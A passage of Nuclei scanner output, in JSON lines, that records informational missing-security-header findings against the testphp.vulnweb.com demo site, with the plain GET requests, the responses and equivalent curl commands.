\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd3\\u001b\\ufffd\\ufffd?\\u0014\\ufffd7\\u0002\\u0017\\ufffdl\\ufffd\\ufffdԴ\\ufffd.QU\\ufffd\\ufffdE\\ufffd#\\ufffd~8#8$g\\ufffd\\ufffd\\ufffdޑ-\\ufffd^\\ufffd\\ufffdKp\\ufffd\\ufffd\\ufffdaLͱG~\\u0013;s\\ufffd8\\ufffd'\\ufffdq\\\\\\ufffd􃨮.\\u0012]\\u001a\\ufffd帒\\u0012\\u001a\\u0007 \\ufffdH\\ufffd\\u0014\\ufffd\\u0003\\u0001U\\ufffd\\ufffd'\\ufffd\\u0000'\\u001c\\u000cV\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd%\\t\\u001eb\\ufffdUf\\ufffd;\\u0010\\ufffdX/%w0\\ufffd9\\ufffdk*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4;\\ufffd\\ufffd\\ufffd\\u0015ޒx*!\\ufffd:\\ufffd\\u0019X\\ufffdn\\ufffd^\\ufffd%\\ufffd\\u0001\\ufffd0\\ufffdF\\ufffdI\\ufffd\\ufffd\\u0018\\ufffd\\ufffd8 \\u001c\\ufffd\\ufffdd2\\ufffd\\u0007\\ufffd\\ufffd\\ufffdŧY\\ufffda\\ufffd8\\ufffdt\\ufffd\\ufffdQ\\u0019db\\ufffd\\ufffd\\u0018\\ufffd\\ufffdI\\u0018\\ufffdrN1\\ufffd\\ufffdV8\\ufffd\\u0015\\ufffdQD\\ufffdJv\\ufffd\\ufffd\\ufffd\\u001fUI\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdD\\ufffdK[\\ufffdqf\\ufffd\\ufffd\\ufffd*\\ufffdm\\u0004\\ufffd\\u0019\\ufffd?8\\ufffd#=\\ufffdZ\\ufffd\\ufffd\\ufffd\\ufffd.\\ufffd\\ufffdI\\ufffdC\\ufffd\\ufffdb\\ufffd\\ufffd\\u001c[\\ufffd\\ufffd#ö\\u003cn\\u0008W\\ufffd\\u0005\\ufffd\\ufffd8 \\ufffd9\\ufffd\\ufffd6IP\\ufffd\\t\\ufffd\\ufffd\\ufffdyq\\u001c\\ufffd\\ufffd7PA\\ufffd\\ufffd=\\ufffd\\ufffd\\u0015\\ufffd0 1\\ufffd+s\\ufffd\\ufffd2\\u0006pO\\ufffd\\ufffd*\\ufffd9.\\ufffd\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd=R\\ufffdd\\u003c\\ufffd\\ufffd\\\\\\ufffd\\ufffd\\u001f\\ufffd\\ufffdl\\ufffd\\ufffd\\ufffd\\u000f\\ufffdț,\\u0008e\\u0000\\ufffdq\\ufffd8$v\\ufffd\\u003cg\\ufffd\\u0017\\ufffdy\\ufffd\\ufffd\\ufffdM\\ufffdҭ\\ufffd./\\ufffd`N@P\\u0019\\ufffd\\u0004\\ufffd\\u00120q\\ufffdۃ\\ufffdv\\u0016\\u001b\\ufffd\\\"\\ufffd\\ufffdŤv2q\\ufffd\\ufffd\\ufffdѩ\\ufffd\\ufffd\\u001eI(\\ufffd\\ufffdez\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdF\\ufffd(\\ufffd\\ufffd$\\ufffd(?ju\\u0015\\ufffdۨ\\ufffd~iʠS\\ufffd\\ufffdȺ\\u0001 \\ufffdRJŁ\\u0026\\ufffd\\ufffdv\\ufffd\\ufffd\\ufffd\\u0005\\u0001:\\u000b\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003eU\\ufffd\\ufffd\\ufffdߐFA\\u001eA\\\"\\ufffd\\ufffdD\\ufffdV}C\\ufffd\\ufffd\\ufffd\\u0005\\u000c\\ufffd\\ufffd\\ufffdwo'\\ufffd\\ufffd\\u0019'i\\ufffdT\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001c\\ufffdCE֯\\ufffd[\\ufffdu\\ufffdʊ\\ufffd\\ufffd\\ufffdH\\ufffdш\\ufffdq\\ufffd\\u0016\\\\\\ufffd\\u001c3\\u000c\\ufffdj\\u001fX\\ufffd;|\\u003c,6p\\ufffd|\\ufffd\\ufffd\\ufffdON\\ufffd\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffdWf\\ufffdڰ.\\ufffdVu \\u0015\\ufffd\\u0006\\u0016@G\\ufffd9\\u003c\\u001e\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdGiz\\ufffdŔ:\\ufffd\\ufffdۥ\\ufffd\\ufffd\\ufffdT\\ufffd\\ufffdh\\ufffd\\ufffdz\\ufffd\\ufffd\\u0006=\\ufffdvFs\\ufffdr\\t\\ufffd4\\ufffds^\\ufffd7\\ufffd\\ufffdÝ\\ufffd\\u0011\\ufffdFW\\ufffd\\ufffd\\u003eT\\ufffd\\u000ct\\ufffdV$\\ufffd\\ufffdO\\ufffd[\\ufffd\\ufffd\\ufffd\\ufffd\\u0013\\u0008cc#M\\u0004\\ufffd\\u0019W\\ufffd\\ufffd\\ufffd\\ufffdGܮ\\u001c\\ufffd\\ufffd\\n~r(i\\ufffd\\ufffdjw\\u0006\\u0018Z\\u003c\\ufffd/\\ufffd\\ufffd\\ufffdF\\ufffd\\ufffdx\\u0007\\u0004\\ufffdb21\\ufffd\\ufffdm\\ufffdu\\ufffdXZ\\ufffd*\\ufffdFھ\\ufffd\\ufffd\\u0000ҰEM\\ufffd\\ufffd$*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffdD}\\ufffd\\ufffdRzE\\u0003\\ufffd\\ufffdH\\ufffd\\ufffd\\ufffda\\ufffd\\ufffd\\u001a\\ufffd{\\ufffd0\\ufffd\\ufffd\\ufffds\\ufffd\\ufffd\\ufffd\\ufffd2\\ufffd(\\ufffd\\ufffdך\\ufffd\\u00063ڢ\\ufffd\\ufffd\\ufffd\\ufffdF\\ufffd(\\ufffd\\ufffd\\\"\\ufffd(\\ufffd\\u0008\\ufffd\\ufffd(Bl\\ufffdmEE\\u0015Ġ\\ufffd\\u0006\\ufffd'=袄\\ufffd\\ufffd\\ufffd\\u000e\\ufffdw\\ufffdj\\ufffdwd\\ufffd:\\ufffdY\\u0018e%O(\\ufffdʜv\\ufffd\\u00020@5\\ufffd:\\ufffd6WWqDIX\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffdE\\u0015\\ufffdn\\ufffd\\u0007\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffdߴ\\ufffd+m6\\ufffd\\ufffde\\nč#;rX\\ufffd\\u001e\\ufffdI$\\ufffd\\ufffdw\\ufffd\\u0000\\u0006\\u0000\\ufffd\\\\0\\u0017\\ufffd7\\ufffd\\ufffdU\\u0003\\r\\u0018\\u000b\\ufffd\\ufffd\\u0011\\ufffd\\ufffd9\\u0018\\ufffd\\u0004w\\ufffd\\u003c`\\ufffd\\ufffdȾ$\\ufffd/\\ufffd\\ufffd\\ufffd\\ufffd*\\ufffdrțö\\u003e\\ufffdW\\ufffd\\ufffd\\u0013\\ufffdO.\\ufffd=\\ufffdП\\ufffd.\\ufffd\\u0004\\u0001\\ufffd\\ufffdc\\ufffdY!\\n\\ufffd\\ufffdWv\\ufffdv\\ufffd\\u0019e\\u0007\\ufffd\\u0015\\ufffd\\ufffdf\\ufffd\\ufffdӧ\\ufffd\\ufffdmn\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd8ݑ\\ufffd؁\\ufffd\\ufffd\\u003c`\\ufffd\\ufffd(\\ufffd:\\ufffd\\u0000\\ufffd\\u000f\\ufffdL\\ufffdOd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdigw|\\ufffd\\ufffd)\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\u00078\\ufffd\\ufffd\\ufffd\\ufffd;\\ufffd98\\ufffd@\\ufffdE\\u0015\\u0017\\ufffd1\\ufffd\\ufffd\\ufffdE\\ufffd\\u001f`\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0002\\ufffd}\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:54.675943033Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36' 'http://testphp.vulnweb.com/pictures/3.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin/1\",\"path\":\"/cgi-bin/1\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin/1\",\"request\":\"GET /cgi-bin/1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:41:39 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on this server.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:55.338929936Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51' 'http://testphp.vulnweb.com/cgi-bin/1'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/2.jpg.tn\",\"path\":\"/pictures/2.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/2.jpg.tn\",\"request\":\"GET /pictures/2.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1353\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:42 GMT\\r\\nEtag: \\\"4dca64a1-549\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001a\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0001\\u0003\\u0004\\u0005\\u0006\\ufffd\\ufffd\\u0000+\\u0010\\u0000\\u0002\\u0002\\u0001\\u0004\\u0002\\u0002\\u0000\\u0004\\u0007\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0011\\u0003\\u0004\\u0012!1AQ\\\"a\\u00142q\\ufffd\\u0005\\u0013$B\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0003\\u0001\\u0002\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000'\\u0011\\u0000\\u0002\\u0002\\u0001\\u0004\\u0002\\u0002\\u0001\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0011\\u0003\\u0004\\u0012!1\\u0005Q\\u00132A\\\"#3aq\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffd\\ufffdd\\ufffdH䏺JU\\ufffd\\t\\u000f\\u0008\\ufffdi{\\u0015+f\\ufffd.7\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB6\\ufffd˨\\ufffd\\ufffd\\ufffd\\ufffd͒\\u001bdס\\u001a\\ufffdi\\ufffdE\\ufffdn\\ufffd_\\ufffd\\ufffd%\\u001atN\\u000c\\ufffdpR\\ufffdH\\u001d\\ufffd,֝\\ufffd\\u0000\\u0001 \\u0014\\u0000@'DQ\\u0003\\u0000Qu?b\\ufffd-\\u0010\\u0005\\ufffdL\\u0000\\u0000\\t\\u0000\\u0000\\u0000-\\u0005\\ufffd\\u0001\\ufffd\\ufffd\\u000cH\\ufffd'A\\u0015F\\ufffd\\u001a\\ufffdʔ?z3G\\ufffd^\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffdK\\ufffd)\\ufffdۓ\\ufffdl\\ufffd%\\ufffd\\ufffd\\\"䨤\\ufffd\\u001f\\ufffdu\\u0015Ed44\\ufffd2\\u0005\\ufffdS\\ufffdD\\u0002Y\\u0005F\\ufffd`\\u0000\\u0000H\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\r\\u0011L`\\\"\\ufffd)4(\\u000cF\\ufffd,\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0003%C\\ufffd9\\ufffd\\ufffd1F\\ufffd$\\ufffdc$\\ufffd\\ufffd\\u000f\\ufffd~\\ufffdQ_\\ufffdק{c'K\\ufffd#\\ufffd\\ufffdr|\\ufffdR\\ufffd\\ufffd(\\ufffdԤ\\ufffdI}#;\\ufffd\\ufffdk\\ufffdʚ\\ufffd\\ufffdϳf\\ufffd\\ufffd\\ufffdEmZ\\u0010\\ufffd\\ufffd\\u0012Kȶ\\ufffdА\\ufffd\\ufffdC\\u0001Z\\u001a\\ufffdB\\u0000\\ufffd\\u0006Ҵ1I\\n\\u0004\\ufffd\\u0000X\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\ufffd\\u001com\\ufffd\\u0004\\ufffd,\\ufffd7\\u000e\\ufffd}\\ufffd\\\\1\\ufffd,\\ufffd\\u001f\\u0017\\ufffd\\ufffd#\\ufffdwG\\ufffdϫ\\ufffd\\u0016\\ufffd\\ufffd\\ufffddPf\\ufffd\\u003c\\u0013\\ufffdK\\ufffd\\ufffdG\\ufffd4j\\ufffd\\ufffd\\u001c\\ufffdi\\ufffd$\\ufffd\\ufffd\\ufffda\\ufffd\\ufffd\\ufffdj\\ufffd4C\\u000b\\ufffd\\ufffd\\ufffdg\\ufffd8\\ufffd`\\ufffd.\\ufffdΜy)\\ufffdN\\ufffd\\ufffd?\\ufffd\\ufffdj\\ufffd\\ufffd\\u001a\\ufffd*\\ufffdw\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd),\\u0012\\ufffd5b\\ufffd\\ufffd\\ufffd\\ufffd/\\ufffdg%\\ufffd\\ufffd[7e\\ufffdb\\ufffd\\u001a\\ufffd\\u0000/\\ufffd$\\ufffdfiƎ֛3\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdХ\\ufffd5b\\ufffdޥ\\ufffd@%Ţ\\u0008\\u0019v\\u0000\\u0000\\u0000\\u0014E\\u0012\\u0000M\\ufffd(\\ufffd\\u0018\\u0008\\ufffdw1h\\ufffd\\ufffd(\\ufffd\\ufffd\\ufffd\\u001e\\u001a7\\ufffd\\ufffdC\\u001c\\ufffd\\ufffd\\ufffd_\\ufffd\\u000c{,\\ufffd\\ufffdَ[]\\ufffd\\ufffdkp\\ufffd\\ufffdp}\\u001d?ĹI\\ufffd\\ufffd'\\ufffd\\u0026\\ufffdjq\\ufffd\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffd\\ufffdWO\\ufffd\\ufffd\\ufffd\\ufffdkV\\ufffd\\ufffd\\ufffd}\\u001bq\\ufffd|\\ufffdc]\\ufffdq5\\u0018\\ufffd\\ufffdp\\u0013\\ufffdJ\\ufffd\\u00003\\ufffd\\ufffd]Fhe\\ufffd\\u0018\\ufffd\\ufffdK\\ufffd4\\ufffd%r}\\ufffd\\ufffdW\\ufffd\\ufffdà\\ufffd\\ufffdd\\ufffdh\\ufffd}\\ufffd\\ufffd-\\ufffd\\\\\\ufffd\\ufffd\\u001c\\ufffdE\\ufffd\\ufffd+B\\ufffd+^\\ufffd4j\\ufffd\\ufffd\\u0004\\u0010\\ufffd}\\ufffd\\u0004\\u000cN\\ufffdqb\\ufffd\\u0000Qe?e`6\\ufffd\\u001b~Ȣې\\ufffd6߲v\\ufffd\\ufffd܄\\u0026\\ufffd\\ufffd\\u0014C\\ufffd\\ufffdJ\\ufffdx\\ufffd\\n\\u003enjlԑ\\ufffd\\ufffd5CEY\\ufffd3\\ufffd\\ufffdj=\\ufffd\\nʱ\\ufffd\\ufffdեj\\ufffdб\\ufffd\\u0000N\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffdp\\ufffd\\ufffd\\ufffdk3\\ufffd\\ufffdҾ\\ufffd9\\ufffd\\ufffd\\ufffd}3t\\ufffd\\ufffd\\ufffdψ\\ufffd2J4\\ufffdN\\rvt\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u003e\\ufffdq\\ufffd%\\ufffd\\ufffd\\t\\ufffd\\ufffd\\u001fB\\ufffd\\ufffde\\ufffd\\u001bJ\\ufffd\\u001e\\ufffdQM\\\"(\\ufffd»^,]\\ufffde\\\\FG2k\\ufffdWAC\\ufffd\\r\\ufffd\\ufffd.\\ufffdbPQf\\ufffd\\ufffd\\ufffdt[^\\tP\\ufffd\\ufffdΣ\\ufffd(\\ufffd\\ufffd\\ufffd\\u00126\\ufffd6\\ufffdYlJ\\u0026\\ufffd\\ufffd\\ufffdI\\u0013D\\u003c\\ufffd\\ufffd\\ufffdd\\u0017 \\u0006\\ufffd\\ufffdp2\\ufffd\\u000e\\ufffd\\ufffdm%\\u000e6\\ufffd\\ufffd\\ufffduc\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd}\\ufffd\\ufffd\\u0000\\u001dl*⏝y\\ufffdJ\\u0019\\ufffdK\\ufffdNn\\ufffdN\\u0012x\\ufffd䋤rr%`\\u0006-W\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\ufffd\\ufffdEd(\\ufffd\\u0003!\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdP\\ufffd8\\ufffd\\ufffdk\\ufffd\\ufffd\\u0005)\\ufffd?,\\u0000+\\ufffd\\ufffd\\ufffd;5\\u0012\\ufffd\\u000c2\\ufffd\\ufffd\\ufffd+\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\u0000e\\ufffd2\\ufffd\\t7\\ufffd6-\\\"v\\ufffd\\u0001f\\ufffdd\\ufffd\\u0026ͺXA\\ufffd\\ufffd\\ufffdSh\\u0000~\\ufffd\\\\\\ufffdW\\ufffd\\ufffd\\ufffd%O\\ufffd\\ufffdr\\ufffd\\ufffdc\\u0014\\ufffd\\u0004\\u003eΌ\\u001b\\ufffdCHe\\u0014\\u0000\\u0008\\ufffd\\ufffd\\u0007\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:55.339234303Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586' 'http://testphp.vulnweb.com/pictures/2.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:55.339278811Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin\",\"path\":\"/cgi-bin\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin\",\"request\":\"GET /cgi-bin HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:41:39 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eForbidden\\u003c/h1\\u003e\\n\\u003cp\\u003eYou don't have permission to access this resource.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:55.339055298Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testphp.vulnweb.com/cgi-bin'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can 